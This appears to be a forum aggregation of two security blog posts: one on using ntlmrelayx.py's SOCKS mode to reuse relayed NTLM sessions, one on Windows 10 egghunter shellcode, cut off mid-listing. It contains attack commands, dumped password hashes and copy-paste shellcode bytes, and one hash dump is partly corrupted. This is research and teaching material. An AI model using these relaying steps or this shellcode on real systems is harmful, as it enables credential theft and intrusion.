Microsoft starting with MS08-068 and then extended to other protocols. There is an interesting thread here that attempts to cover this topic. Relay Credentials to a third-party host (a.k.a. Credential Relaying): Still widely used, with no specific patch available since this is basically an authentication protocol flaw. There are effective workarounds that could help against this issue (e.g. packet signing) only if the network protocol used supports it. There were, however, some attacks against this protection as well (e.g. CVE-2015-0005). In a nutshell, we could abstract the attack to the NTLM protocol, regardless of the underlying application layer protocol used, as illustrated here (representing the second flavor described above): Over the years, there were some open source solutions that extended the original SMB attack to other protocols (a.k.a. cross-protocol relaying). A few years ago, Dirk-Jan Mollema extended the impacket’s original smbrelayx.py implementation into a tool that could target other protocols as well. We decided to call it ntlmrelayx.py and since then, new protocols to relay against have been added: SMB / SMB2 LDAP MS-SQL IMAP/IMAPs HTTP/HTTPs SMTP I won’t go into details on the specific attacks that can be done, since again, there are already excellent explanations out there (e.g. here and here ). Something important to mention here is that the original use case for ntlmrelayx.py was basically a one-shot attack, meaning that whenever we could catch a connection, an action (or attack) would be triggered using the successfully relayed authentication data (e.g. create a user through LDAP, download a specific HTTP page, etc.). Nevertheless, amazing attacks were implemented as part of this approach (e.g. ACL privilege escalation as explained here). Also, initially, most of the attacks only worked for those credentials that had Administrative privileges, although over time we realized there were more possible use cases targeting regular users. These two things, along with an excellent presentation at DEFCON 20 motivated me into extending the use cases into something different. Value every session, use it, and reuse it at will When you’re attacking networks, if you can intercept a connection or attract a victim to you, you really want to take full advantage of it, regardless of the privileges of that victim’s account. The higher the better of course, but you never know the attack paths to your objectives until you test different approaches. With all this in mind, coupled with the awesome work done on ZackAttack , it was clear that there could be an extension to ntlmrelayx.py that would strive to: Try to keep it open as long as possible once the authentication data is successfully relayed Allow these sessions to be used multiple times (sometimes even concurrently) Relay any account, regardless of its privilege at the target system Relay to any possible protocol supporting NTLM and provide a way that would be easy to add new ones Based on these assumptions I decided to re-architect ntlmrelayx.py to support these scenarios. The following diagram describes a high-level view of it: We always start with a victim connecting to any of our Relay Servers which are servers that implement support for NTLM as the authentication mechanism. At the moment, we have two Relay Servers, one for HTTP/s and another one for SMB (v1 and v2+), although there could be more (e.g. RPC, LDAP, etc.). These servers know little about both the victim and target. The most important part of these servers is to implement a specific application layer protocol (in the context of a server) and engage the victim into the NTLM Authentication process. Once the victim took the bait, the Relay Servers look for a suitable Relay Protocol Client based on the protocol we want to relay credentials to at the target machines (e.g. MSSQL). Let’s say a victim connects to our HTTP Server Relay Server and we want to relay his credentials to the target’s MSSQL service (HTTP->MSSQL). For that to happen, there should be a MSSQL Relay Protocol Client that could establish the communication with the target and relay the credentials obtained by the Relay Server. A Relay Protocol Client plugin knows how to talk a specific protocol (e.g. MSSQL), how to engage into an NTLM authentication using relayed credentials coming from a Relay Server and then keep the connection alive (more on that later). Once a relay attempt worked, each instance of these Protocol Clients will hold a valid session against the target impersonating the victim’s identity. We currently support Protocol Clients for HTTP/s, IMAP/s, LDAP/s, MSSQL, SMB (v1 and 2+) and SMTP, although there could be more! (e.g. POP3, Exchange WS, etc.). At this stage the workflow is twofold: If ntlmrelayx.py is running configured to run one-shot actions, the Relay Server will search for the corresponding Protocol Attack plugin that implements the static attacks offered by the tool. If ntlmrelayx.py is running configured with -socks, not action will be taken, and the authenticated sessions will be hold active, so it can later on be used and reused through a SOCKS proxy. SOCKS Server and SOCKS Relay plugins Let’s say we’re running in -socks mode and we have a bunch of victims that took the bait. In this case we should have a lot of sessions waiting to be used. The way we implemented the use of these involves two main actors: SOCKS Server: A SOCKS 4/5 Server that holds all the sessions and serves them to SOCKS clients. It also tries these sessions to be kept up even if not used. In order to do that, a keepAlive method on every session is called from time to time. This keepalive mechanism is bound to the particular protocol connection relayed (e.g. this is what we do for SMB ). SOCKS Relay Plugin: When a SOCKS client connects to the SOCKS Server, there are some tricks we will need to apply. Since we’re holding connections that are already established (sessions), we will need to trick the SOCKS client that an authentication is happening when, in fact, it’s not. The SOCKS server will also need to know not only the target server the SOCKS client wants to connect against but also the username, so it can verify whether or not there’s an active session for it. If so, then it will need to answer the SOCKS client back successfully (or not) and then tunnel the client thru the session's connection. Finally, whenever the SOCKS client closes the session (which we don’t really want to do since we want to keep these sessions active) we would need to fake those calls as well. Since all these tasks are protocol specific, we’ve created a plugins scheme that would let contributors add more protocols that would run through SOCKS (e.g. Exchange Web Services?). We’re currently supporting tunneling connections through SOCKS for SMB, MSSQL, SMTP, IMAP/S, HTTP/S. With all this information being described, let’s get into some hands-on examples. Examples in Action The best way to understand all of this is through examples, so let’s get to playing with ntlmrelayx.py. First thing you should do is install the latest impacket. I usually play with the dev version but if you want to stay on the safe side, we tagged a new version a few weeks ago. Something important to have in mind (especially for Kali users), is that you have to be sure there is no previous impacket version installed since sometimes the new one will get installed at a different directory and the old one will still be loaded first (check this for help). Always be sure, whenever you run any of the examples that the version banner shown matches the latest version installed. Once everything is installed, the first thing to do is to run ntlmrelayx.py specifying the targets (using the -t or -tf parameters) we want to attack. Targets are now specified in URI syntax, where: Scheme: specifies the protocol to target (e.g. smb, mssql, all) Authority: in the form of domain\username@host:port ( domain\username are optional and not used - yet) Path: optional and only used for specific attacks (e.g. HTTP, when you need to specify a BASE URL) For example, if we specify the target as mssql://10.1.2.10:6969, every time we get a victim connecting to our Relay Servers, ntlmrelayx.py will relay the authentication data to the MSSQL service (port 6969) at the target 10.1.2.10. There’s a special case for all://10.1.2.10. If you specify that target, ntlmrelayx.py will expand that target based on the amount of Protocol Client Plugins available. As of today, that target will get expanded to ‘smb://’, ‘mssql://’, ‘http://’, ‘https://’, ‘imap://’, ‘imaps://’, ‘ldap://’, ‘ldaps://’ and ‘smtp://’, meaning that for every victim connecting to us, each credential will be relayed to those destinations (we will need a victim’s connection for each destination). Finally, after specifying the targets, all we need is to add the -socks parameter and optionally -smb2support (so the SMB Relay Server adds support for SMB2+) and we’re ready to go: # ./ntlmrelayx.py -tf /tmp/targets.txt -socks -smb2support Impacket v0.9.18-dev - Copyright 2002-2018 Core Security Technologies [*] Protocol Client SMTP loaded.. [*] Protocol Client SMB loaded.. [*] Protocol Client LDAP loaded.. [*] Protocol Client LDAPS loaded.. [*] Protocol Client HTTP loaded.. [*] Protocol Client HTTPS loaded.. [*] Protocol Client MSSQL loaded.. [*] Protocol Client IMAPS loaded.. [*] Protocol Client IMAP loaded.. [*] Running in relay mode to hosts in targetfile [*] SOCKS proxy started. Listening at port 1080 [*] IMAP Socks Plugin loaded.. [*] IMAPS Socks Plugin loaded.. [*] SMTP Socks Plugin loaded.. [*] MSSQL Socks Plugin loaded.. [*] SMB Socks Plugin loaded.. [*] HTTP Socks Plugin loaded.. [*] HTTPS Socks Plugin loaded.. [*] Setting up SMB Server [*] Setting up HTTP Server [*] Servers started, waiting for connections Type help for list of commands ntlmrelayx> And then with the help of Responder, phishing emails sent or other tools, we wait for victims to connect. Every time authentication data is successfully relayed, you will get a message like: [*] Authenticating against smb://192.168.48.38 as VULNERABLE\normaluser3 SUCCEED [*] SOCKS: Adding VULNERABLE/NORMALUSER3@192.168.48.38(445) to active SOCKS connection. Enjoy At any moment, you can get a list of active sessions by typing socks at the ntlmrelayx.py prompt: ntlmrelayx> socks Protocol Target Username Port -------- -------------- ------------------------ ---- SMB 192.168.48.38 VULNERABLE/NORMALUSER3 445 MSSQL 192.168.48.230 VULNERABLE/ADMINISTRATOR 1433 MSSQL 192.168.48.230 CONTOSO/NORMALUSER1 1433 SMB 192.168.48.230 VULNERABLE/ADMINISTRATOR 445 SMB 192.168.48.230 CONTOSO/NORMALUSER1 445 SMTP 192.168.48.224 VULNERABLE/NORMALUSER3 25 SMTP 192.168.48.224 CONTOSO/NORMALUSER1 25 IMAP 192.168.48.224 CONTOSO/NORMALUSER1 143 As can be seen, there are multiple active sessions impersonating different users against different targets/services. These are some of the targets/services specified initially to ntlmrelayx.py using the -tf parameter. In order to use them, for some use cases, we will be using proxychains as our tool to redirect applications through our SOCKS proxy. When using proxychains, be sure to configure it (configuration file located at /etc/proxychains.conf) pointing the host where ntlmrealyx.py is running; the SOCKS port is the default one (1080). You should have something like this in your configuration file: [ProxyList] socks4 192.168.48.1 1080 Let’s start with the easiest example. Let’s use some SMB sessions with Samba’s smbclient. The list of available sessions for SMB are: Protocol Target Username Port -------- -------------- ------------------------ ---- SMB 192.168.48.38 VULNERABLE/NORMALUSER3 445 SMB 192.168.48.230 VULNERABLE/ADMINISTRATOR 445 SMB 192.168.48.230 CONTOSO/NORMALUSER1 445 Let’s say we want to use the CONTOSO/NORMALUSER1 session, we could do something like this: root@kalibeto:~# proxychains smbclient //192.168.48.230/Users -U contoso/normaluser1 ProxyChains-3.1 (http://proxychains.sf.net) WARNING: The "syslog" option is deprecated |S-chain|-<>-192.168.48.1:1080-<><>-192.168.48.230:445-<><>-OK Enter CONTOSO\normaluser1's password: Try "help" to get a list of possible commands. smb: \> ls . DR 0 Thu Dec 7 19:07:54 2017 .. DR 0 Thu Dec 7 19:07:54 2017 Default DHR 0 Tue Jul 14 03:08:44 2009 desktop.ini AHS 174 Tue Jul 14 00:59:33 2009 normaluser1 D 0 Wed Nov 29 14:14:50 2017 Public DR 0 Tue Jul 14 00:59:33 2009 5216767 blocks of size 4096. 609944 blocks available smb: \> A few important things here: You need to specify the right domain and username pair that matches the output of the socks command. Otherwise, the session will not be recognized. For example, if you didn’t specify the domain name on the smbclient parameter, you would get an output error in ntmlrelayx.py saying: [-] SOCKS: No session for WORKGROUP/NORMALUSER1@192.168.48.230(445) available When you’re asked for a password, just put whatever you want. As mentioned before, the SOCKS Relay Plugin that will handle the connection will fake the login process and then tunnel the original connection. Just in case, using the Administrator’s session will give us a different type of access: root@kalibeto:~# proxychains smbclient //192.168.48.230/c$ -U vulnerable/Administrator ProxyChains-3.1 (http://proxychains.sf.net) WARNING: The "syslog" option is deprecated |S-chain|-<>-192.168.48.1:1080-<><>-192.168.48.230:445-<><>-OK Enter VULNERABLE\Administrator's password: Try "help" to get a list of possible commands. smb: \> dir $Recycle.Bin DHS 0 Thu Dec 7 19:08:00 2017 Documents and Settings DHS 0 Tue Jul 14 01:08:10 2009 pagefile.sys AHS 1073741824 Thu May 3 16:32:43 2018 PerfLogs D 0 Mon Jul 13 23:20:08 2009 Program Files DR 0 Fri Dec 1 17:16:28 2017 Program Files (x86) DR 0 Fri Dec 1 17:03:57 2017 ProgramData DH 0 Tue Feb 27 15:02:13 2018 Recovery DHS 0 Wed Sep 30 18:00:31 2015 System Volume Information DHS 0 Wed Jun 6 12:24:46 2018 tmp D 0 Sun Mar 25 09:49:15 2018 Users DR 0 Thu Dec 7 19:07:54 2017 Windows D 0 Tue Feb 27 16:25:59 2018 5216767 blocks of size 4096. 609996 blocks available smb: \> Now let’s play with MSSQL, we have the following active sessions: ntlmrelayx> socks Protocol Target Username Port -------- -------------- ------------------------ ---- MSSQL 192.168.48.230 VULNERABLE/ADMINISTRATOR 1433 MSSQL 192.168.48.230 CONTOSO/NORMALUSER1 1433 impacket comes with a tiny TDS client we can use for this connection: root@kalibeto:# proxychains ./mssqlclient.py contoso/normaluser1@192.168.48.230 -windows-auth ProxyChains-3.1 (http://proxychains.sf.net) Impacket v0.9.18-dev - Copyright 2002-2018 Core Security Technologies Password: |S-chain|-<>-192.168.48.1:1080-<><>-192.168.48.230:1433-<><>-OK [*] ENVCHANGE(DATABASE): Old Value: master, New Value: master [*] ENVCHANGE(LANGUAGE): Old Value: None, New Value: us_english [*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192 [*] INFO(WIN7-A\SQLEXPRESS): Line 1: Changed database context to 'master'. [*] INFO(WIN7-A\SQLEXPRESS): Line 1: Changed language setting to us_english. [*] ACK: Result: 1 - Microsoft SQL Server (120 19136) [!] Press help for extra shell commands SQL> select @@servername -------------------------------------------------------------------------------------------------------------------------------- WIN7-A\SQLEXPRESS SQL> I’ve tested other TDS clients as well successfully. As always, the most important thing is to specify correctly the domain/username information. Another example that is very interesting to see in action is using IMAP/s sessions with Thunderbird’s native SOCKS proxy support. Based on this exercise, we have the following IMAP session active: Protocol Target Username Port -------- -------------- ------------------------ ---- IMAP 192.168.48.224 CONTOSO/NORMALUSER1 143 We need to configure an account in Thunderbird for this user. A few things to have in mind when doing so: It is important to specify Authentication method ‘Normal Password’ since that’s the mechanism the IMAP/s SOCKS Relay Plugin currently supports. Keep in mind, as mentioned before, this will be a fake authentication. Under Server Setting->Advanced you need to set the ‘Maximum number of server connections to cache’ to 1. This is very important otherwise Thunderbird will try to open several connections in parallel. Finally, under the Network Setting you will need to point the SOCKS proxy to the host where ntlmrelayx.py is running, port 1080: Now we’re ready to use that account: You can even subscribe to other folders as well. If you combine IMAP/s sessions with SMTP ones, you can fully impersonate the user’s mailbox. Only constrain I’ve observed is that there’s no way to keep alive a SMTP session. It will last for a fixed period of time that is configured through a group policy (default is 10 minutes). Finally, just in case, for those boxes we have Administrative access on, we can just run secretsdump.py through proxychain and get the user’s hashes: root@kalibeto # proxychains ./secretsdump.py vulnerable/Administrator@192.168.48.230 ProxyChains-3.1 (http://proxychains.sf.net) Impacket v0.9.18-dev - Copyright 2002-2018 Core Security Technologies Password: |S-chain|-<>-192.168.48.1:1080-<><>-192.168.48.230:445-<><>-OK [*] Service RemoteRegistry is in stopped state [*] Starting service RemoteRegistry [*] Target system bootKey: 0xa6016dd8f2ac5de40e5a364848ef880c [*] Dumping local SAM hashes (uid:rid:lmhash:nthash) Administrator:500:aad3b435b51404eeaad3b435b51404ee:aeb450b6b165aa734af28891f2bcd2ef::: Guest:501:aad3b435b51404eeaad3b435b51404ee:40cb4af33bac0b739dc821583c91f009::: HomeGroupUser$:1002:aad3b435b51404eeaad3b435b51404ee:ce6b7945a2ee2e8229a543ddf86d3ceb::: [*] Dumping cached domain logon information (uid:encryptedHash:longDomain:domain) pcadminuser2:6a8bf047b955e0945abb8026b8ce041d:VULNERABLE.CONTOSO.COM:VULNERABLE::: Administrator:82f6813a7f95f4957a5dc202e5827826:VULNERABLE.CONTOSO.COM:VULNERABLE::: normaluser1:b18b40534d62d6474f037893111960b9:CONTOSO.COM:CONTOSO::: serviceaccount:dddb5f4906fd788fc41feb8d485323da:VULNERABLE.CONTOSO.COM:VULNERABLE::: normaluser3:a24a1688c0d71b251efec801fd1e33b1:VULNERABLE.CONTOSO.COM:VULNERABLE::: [*] Dumping LSA Secrets [*] $MACHINE.ACC VULNERABLE\WIN7-A$:aad3b435b51404eeaad3b435b51404ee:ef1ccd3c502bee484cd575341e4e9a38::: [*] DPAPI_SYSTEM 0000 01 00 00 00 1C 17 F6 05 23 2B E5 97 95 E0 E4 DF ........#+...... 0010 47 96 CC 79 1A C2 6E 14 44 A3 C1 9E 6D 7C 93 F3 G..y..n.D...m|.. 0020 9A EC C6 8A 49 79 20 9D B5 FB 26 79 ....Iy ...&y DPAPI_SYSTEM:010000001c17f605232be59795e0e4df4796cc791ac26e1444a3c19e6d7c93f39aecc68a4979209db5fb2679 [*] NL$KM 0000 EB 5C 93 44 7B 08 65 27 9A D8 36 75 09 A9 CF B3 .\.D{.e'..6u.... 0010 4F AF EC DF 61 63 93 E5 20 C5 4F EF 3C 65 FD 8C O...ac.. .O.-192.168.48.1:1080-<><>-192.168.48.230:445-<><>-OK From this point on, you probably don’t need to use the relayed credentials anymore. Final Notes Hopefully this blog post gives some hints on what the SOCKS support in ntlmrealyx.py is all about. There are many things to test, and surely a lot of bugs to solve (there are known stability issues). But more important, there are still many protocols supporting NTLM that haven’t been fully explored! I’d love to get your feedback and as always, pull requests are welcomed. If you have questions or comments, feel free to reach out to me at @agsolino. Acknowledgments Dirk-Jan Mollema (@_dirkjan) for his awesome job initially in ntlmrelayx.py and then all the modules and plugins contributed over time. Martin Gallo (@MartinGalloAr) for peer reviewing this blog post. Sursa: https://www.secureauth.com/blog/playing-relayed-credentials
    1 point
  7. Windows 10 egghunter (wow64) and more Published April 23, 2019 | By Peter Van Eeckhoutte (corelanc0d3r) Introduction Ok, I have a confession to make, I have always been somewhat intrigued by egghunters. That doesn’t mean that I like to use (or abuse) an egghunter just because I fancy what it does. In fact, I believe it’s a good practise to try to avoid egghunters if you can, as they tend to slow things down. What I mean, is that I have been fascinated by techniques to search memory without making the process crash. It’s just a personal thing, it doesn’t matter too much. What really matters is that Corelan Team is back. Well, I’m back. This is my (technical) first post in nearly 3 years, and the first post since Corelan Team kind of “faded out” before that. (In fact, I’m curious to see if (some of) the original Corelan Team members would be able to find spare time again to join forces and to start doing / publishing some research. I certainly hope so but let’s see what happens.) As some of you already know, I have recently left my day job. (long story, too long for this post. Glad to share details over a drink). I have launched a new company called “Corelan Consulting” and I’m trying to make a living through exploit development training and CyberSecurity consulting. Trainings are going well, with 2019 almost completely filled up, and already planning classes in 2020. You can find the training schedules here. If you’re interested in setting up the Corelan Bootcamp or Corelan Advanced class in your company or at a conference – read the testimonials first and then contact me I still need to work on my sales skills in relation with locking in consulting gigs, but I’m sure things will work out fine in the end. (Yes, please contact me if you’d like me to work with you, I’m available for part-time governance/risk management & assessment work ;-)) Anyway, while building the 2019 edition of the Corelan Bootcamp, updating the materials for Windows 10, I realised that the wow64 egghunter for Windows 7, written by Lincoln, no longer works on Windows 10. In fact, I kind of expected it to fail, as we already knew that Microsoft keeps changing the syscall numbers with every major Windows release. And since the most commonly used version egghunter mechanism is based on the use of a system call, it’s clear that changing the number will break the egghunter. By the way : the system calls (and their numbers) are documented here: https://j00ru.vexillium.org/syscalls/nt/64/ (Thanks Mateusz “j00ru” Jurczyk). You can find the evolution of the “NtAccessCheckAndAuditAlarm” system call number in the table on the aforementioned website. Anyway, changing a system call number doesn’t really sound all too exciting or difficult, but it also became clear that the arguments & stack layout, the behavior of the system call in Windows 10, also differs from the Windows 7 version. We found some win10 egghunter PoCs flying around, but discovered that they did not work reliably in real exploits. Lincoln looked at it for a few moments, did some debugging andd produced a working version for Windows 10. So, that means we’re quite proud to be able to announce a working (wow64) egghunter for windows 10. The version below has been tested in real exploits and targets. wow64 egghunter for Windows 10 As explained, the challenge was to figure out where & how the new system call expects it’s arguments, how it changes registers & the stack to make sure that the arguments are always in the right place and provide the intended functionality: to test if a given page is accessible or not, and to do so without making the process die. This is what the updated routine looks like: "\x33\xD2" #XOR EDX,EDX "\x66\x81\xCA\xFF\x0F" #OR DX,0FFF "\x33\xDB" #XOR EBX,EBX "\x42" #INC EDX "\x52" #PUSH EDX "\x53" #PUSH EBX "\x53" #PUSH EBX "\x53" #PUSH EBX "\x53" #PUSH EBX "\x6A\x29" #PUSH 29 (system call 0x29) "\x58" #POP EAX "\xB3\xC0" #MOV BL,0C0 "\x64\xFF\x13" #CALL DWORD PTR FS:[EBX] (perform the system call) "\x83\xC4\x10" #ADD ESP,0x10 "\x5A" #POP EDX "\x3C\x05" #CMP AL,5 "\x74\xE3" #JE SHORT "\xB8\x77\x30\x30\x74" #MOV EAX,74303077 "\x8B\xFA" #MOV EDI,EDX "\xAF" #SCAS DWORD PTR ES:[EDI] "\x75\xDE" #JNZ SHORT "\xAF" #SCAS DWORD PTR ES:[EDI] "\x75\xDB" #JNZ SHORT "\xFF\xE7" #JMP EDI This egghunter works great on Windows 10, but it assumes you’re running inside the wow64 environment (32bit process on 64bit OS). Of course, as Lincoln has explained in his blogpost, you can simply add a check to determine the architecture and make the egghunter work on native 32bit OS as well. You can generate this egghunter with mona.py too – simply run !mona egg -wow64 -winver 10 When debugging this egghunter (or any wow64 egghunter that is using system calls), you’ll notice access violations during the execution of the system call. These access violations can be safely passed through and will be handled by the OS… but the debugger will break every time it sees an access violation. (In essence, the debugger will break as soon as the code attempts to test a page that is not readable. In other words, you’ll get an awful lot of access violations, requiring your manual intervention.) If you’re using Immunity Debugger, you can simply tell the debugger to ignore the access violations. To do so, click on ‘debugging options’, and open the ‘exceptions’ tab. Add the following hex values under “Add range”: 0xC0000005 – ACCESS VIOLATION 0x80000001 – STATUS_GUARD_PAGE_VIOLATION Of course, when you have finished debugging the egghunter, don’t forget to remove these 2 exception again Going forward For sure, MS is entitled to change whatever they want in their Operating System. I don’t think developers are supposed to issue system calls themselves, I believe they should be using the wrapper functions in ntdll.dll instead. In other words, it should be “safe” for MS to change system call numbers. I don’t know what is behind the the system call number increment with every Windows version, and I don’t know if the system call numbers are going to remain the same forever, as Windows 10 has been labeled as the “last Windows version”. From an egghunter perspective that would be great. As an increasingly larger group of people adopts Windows 10, the egghunter will have an increasingly larger success ratio as well. But in reality I don’t know if that is a valid assumption to make or not. In any case it made me think: Would there be a way to use a different technique to make an egghunter work, without the use of system calls? And if so, would that technique also work on older versions of Windows? And if we’re not using system calls, would it work on native x86 and wow64 environments right away? Let’s see. Exception Handling The original paper on egghunters (“Safely Searching Process Virtual Address Space”) written by skape (2004!) already introduced the the use of custom exception handlers to handle the access violation that will occur if you’re trying to read from a page that is not accessible. By making the handler point back into the egghunter, the egghunter would be able to move on. The original implementation, unfortunately, no longer seems to work. While doing some testing (many years ago, as well as just recently on Windows 10), it looks the OS doesn’t really allow you to make the exception handler to point directly to the stack (haven’t tried the heap, but I expect the same restriction to be in place). In other words, if the egghunter runs from the stack or heap, you wouldn’t be able to make the egghunter use itself as exception handler and move on. Before looking at a possible solution, let’s remind ourselves of how the exception handling mechanism works. When the OS sees an exception and decides to pass it to the corresponding thread in the process, it will instruct a function in ntdll.dll to launch the Exception Handling mechanism within that thread. This routine will check the TEB at offset 0 (accessible via FS:[0]) and will retrieve the address of the topmost record in the exception handling chain on the stack. Each record consists of 2 fields: struct EXCEPTION_REGISTRATION { EXCEPTION_REGISTRATION *nextrecord; // pointer to next record (nseh) DWORD handler; // pointer to handler function }; The topmost record contains the address of the routine that will be called first in order to check if the application can handle the exception or not. If that routine fails, the next record in the chain will be tried (either until one of the routines is able to handle the exception, or until the default handler will be used, sending the process to heaven). So, in other words, the routine in ntdll.dll will find the record, and will call the “handler” address (i.e. whatever is placed in the second field of the record). So, translating this into the egghunter world: If we want to maintain control over what happens when an exception occurs, we’ll have to create a custom “topmost” SEH record, making sure it is the topmost record at all times during the execution of the egghunter, and we’ll have to make the record handler point into a routine that allows our egghunter to continue running and move on with the next page. Again, if our “custom” record is the topmost record, we’ll be sure that it will be the first one to be used. Of course we should be careful and take the consequences and effects of running the exception handling mechanism into account: The exception handling mechanism will change the value of ESP. The functionality will create an “exception dispatcher stack” frame at the new ESP location, with a pointer to the originating SEH frame at ESP+8. We’ll have to “undo” this change to ESP to make sure we make it point back to the area on the stack where the egghunter is storing its data. Next, we should also avoid creating new records all the time. Instead, we should try to continue to use the same record over and over again, avoiding to push data to the stack all the time, avoiding that we’d run out of stack space. Additionally, of course, the egghunter needs to be able to run from any location in memory. Finally, whatever we put as “SE Handler” (second field of the record) has to be SAFESEH compatible. Unfortunately that is the weak spot of my “solution”. Additionally, my routine won’t work if SEHOP is active. (but that’s not active by default on client systems IIRC) Creating our own custom SEH record means that we’re going to be writing something to the stack, overwriting/damaging what is already there. So, if your egghunter/shellcode is also on the stack around that location, you may want to adjust ESP before running the egghunter. Just sayin’ This is what my SEH based egghunter looks like (ready to compile with nasm): ; Universal SEH based egg hunter (x86 and wow64) ; tested on Windows 7 & Windows 10 ; written by Peter Van Eeckhoutte (corelanc0d3r) ; www.corelan.be - www.corelan-training.com - www.corelan-consulting.com ; ; warning: will damage stack around ESP ; ; usage: find a non-safeseh protected pointer to pop/pop/ret and put it in the placeholder below ; [BITS 32] CALL $+4 ; getPC routine RET POP ECX ADD ECX,0x1d ; offset to "handle" routine ;set up SEH record XOR EBX,EBX PUSH ECX ; remember where our 'custom' SE Handler routine will be PUSH ECX ; p/p/r will fly over this one PUSH 0x90c3585c ; trigger p/p/r again :) PUSH 0x44444444 ; Replace with P/P/R address ** PLACEHOLDER ** PUSH 0x04EB5858 ; SHORT JUMP MOV DWORD [FS:EBX],ESP ; put our SEH record to top of chain JMP nextpage handle: ; our custom handle SUB ESP,0x14 ; undo changes to ESP XOR EBX,EBX MOV DWORD [FS:EBX],ESP ; make our SEH record topmost again MOV EDX, [ESP-4] ; pick up saved EDX INC EDX nextpage: OR DX, 0x0FFF INC EDX MOV [ESP-4], EDX ; remember where we are searching MOV EAX, 0x74303077 ; w00t MOV EDI, EDX SCASD JNZ nextpage+5 SCASD JNZ nextpage+5 JMP EDI Let’s look at the various components of the egg hunter. First, the hunter starts with a “GetPC” routine (designed to find it’s own absolute address in memory), followed by an instruction that adds 0x1d bytes to the address it was able to retrieve using that GetPC routine. After adding this offset, ECX will contain the absolute address where the actual “handler” routine will be in memory. (referenced by label “handle” in the code above). Keep in mind, the egghunter needs to be able to dynamically determine this location at runtime, because the egghunter will use the exception handler mechanism to come back to itself and continue running the egghunter. That means we’ll need to know (determine) where it is, store the reference on the stack, so we can “retrieve/jump” to it later during the exception handling mechanism. Next, the code is creating a new custom SEH record. Although a SEH record only takes 2 fields, the code is actually pushing 5 specially crafted values on the stack. Only the last 2 of them will become the SEH record, the other ones are used to allow the exception handler to restore ESP and continue execution of the egghunter. Let’s look at what gets pushed and why: PUSH ECX: this is the address where the “handle” routine is in memory, as determined by the GetPC routine earlier. The exception handler will need to eventually return to this one. PUSH ECX: we’re pushing the address again, but this one won’t be used. We’ll be using the pop/pop/ret pointer twice. The first time will be used for the exception handler to bring execution back to our code, the second time it will be used to return to the “ECX” stored on the stack. This second ECX is just there to compensate for the second POP in the p/p/r. You can push anything you like on the stack. PUSH 0x90c3585C: this code will get executed. It’s a POP ESP, POP EAX, RET. This will reset the stack back to the original location on the stack where we have stored the SEH record. The RET will transfer execution back to the p/p/r pointer on the stack (part of the SEH record). In other words, the p/p/r pointer will be used twice. The second time, it will eventually return to the address of ECX that was stored on the stack. (see previous PUSH ECX instructions) Next, the real SEH record is created, by pushing 2 more values to the stack: Pointer to P/P/R (must be a non-safeseh protected pointer). We have to use a p/p/r because we can’t make this handler field point directly into the stack (or heap). As we can’t just make the exception mechanism go back directly to our codewe’ll use the pop/pop/ret to maintain control over the execution flow. In the code above, you’ll have to replace the 0x44444444 value with the address of a non-SafeSEH protected pop/pop/ret. Then, when an exception occurs (i.e. when the egghunter reaches a page that is not accessible), the pop/pop/ret will get triggered execute for the first time, returning to the 4 bytes in the first field of the SEH record. In the first field of the SEH record, I have placed 2 pops and a short jump forward sequence. This will adjust the stack slightly, so the pointer to the SEH record ends up at the top of the stack. Next it will jump to the instruction sequence that was pushed onto the stack earlier on (0x90C3585C). As explained, that sequence will trigger the POP/POP/RET again, which will eventually return to the stored ECX pointer (which is where the egghunter is) To complete the creation of the SEH record and to mark it as the topmost record, we’re simply writing its location into the TEB. As our new custom SEH record currently sits at ESP, we can simply write the value of ESP into the TEB at offset 0 (MOV DWORD [FS:EBX],ESP). (That’s why we cleared EBX in the first place) At this point, the egghunter is ready to test if a page is readable. The code will use EDX as the reference where to read from. The routine starts by going to the end of the page (OR DX, 0x0FFF), then goes to the start of the next page (INC EDX), and then we store the value of EDX on the stack (at [ESP-4]), so the exception handler would be able to pick it up later on. If the read attempt (SCASD) fails, an access violation will be triggered. The access violation will use our custom SEH record (as it is supposed to be the topmost record), and that routine is designed to resume execution of the egghunter (by running the “handle” routine, which will eventually restore the EDX pointer from the stack and move on to the next page). The “handle” routine will: Adjust the stack again, correcting its position to put it where it is/should be when running the egghunter. (SUB ESP,0x14) Next it will make sure our custom record is the topmost SEH record again (just anticipating in case some other code would have added a new topmost record). Finally it will pick up a reference from the stack (where we stored the last address we’ve tried to access) and move on (with the next page). If a page is readable, the egghunter will check for the presence of the tag, twice. If the tags are found, the final “JMP EDI” will tell the CPU to run the code placed right after the double tag. When debugging the egghunter, you’ll notice that it’ll throw access violations (when the code tries to access a page that is not accessible). Of course, in this case, these access violations are absolutely normal, but you’ll still have to pass the exceptions back to the application (Shift F9). You can also configure Immunity Debugger to ignore (and pass) the exceptions automatically, but configuring the Exceptions. To do so, click on ‘debugging options’, and open the ‘exceptions’ tab. Add the following hex values under “Add range”: 0xC0000005 – ACCESS VIOLATION 0x80000001 – STATUS_GUARD_PAGE_VIOLATION Of course, when you have finished debugging the egghunter, don’t forget to remove these 2 exception again. In order to use the egghunter, you’ll need to convert the asm instructions into opcode first. To do so, you’ll need to install nasm. (I have used the Win32 installer from https://www.nasm.us/pub/nasm/releasebuilds/2.14.02/win32/) Save the asm code snippet above into a text file (for instance “c:\dev\win10_egghunter_seh.nasm”). Next, run “nasm” to convert it into a binary file that contains the opcode: "C:\Program Files (x86)\NASM\nasm.exe" -o c:\dev\win10_egghunter_seh.obj c:\dev\win10_egghunter_seh.nasm Next, dump the contents of the binary file to a hex format that you can use in your scripts and exploits: python c:\dev\bin2hex.py c:\dev\win10_egghunter_seh.obj (You can find a copy of the bin2hex.py script in Corelan’s github repository) If all goes well, this is what you’ll get: "\xe8\xff\xff\xff\xff\xc3\x59\x83" "\xc1\x1d\x31\xdb\x51\x51\x68\x5c" "\x58\xc3\x90\x68\x44\x44\x44\x44" "\x68\x58\x58\xeb\x04\x64\x89\x23" "\xeb\x0d\x83\xec\x14\x31\xdb\x64" "\x89\x23\x8b\x54\x24\xfc\x42\x66" "\x81\xca\xff\x0f\x42\x89\x54\x24" "\xfc\xb8\x77\x30\x30\x74\x89\xd7" "\xaf\x75\xf1\xaf\x75\xee\xff\xe7" Again, don’t forget to replace the \x44\x44\x44\x44 (end of third line) with the address of a pop/pop/ret (and to store the address in little endian, if you are editing the bytes ) Python friendly copy/paste code: egghunter = ("\xe8\xff\xff\xff\xff\xc3\x59\x83" "\xc1\x1d\x31\xdb\x51\x51\x68\x5c" "\x58\xc3\x90\x68") egghunter += "\x??\x??\x??\x??" #replace with pointer to pop/pop/ret. Use !mona seh egghunter += ("\x68\x58\x58\xeb\x04\x64\x89\x23" 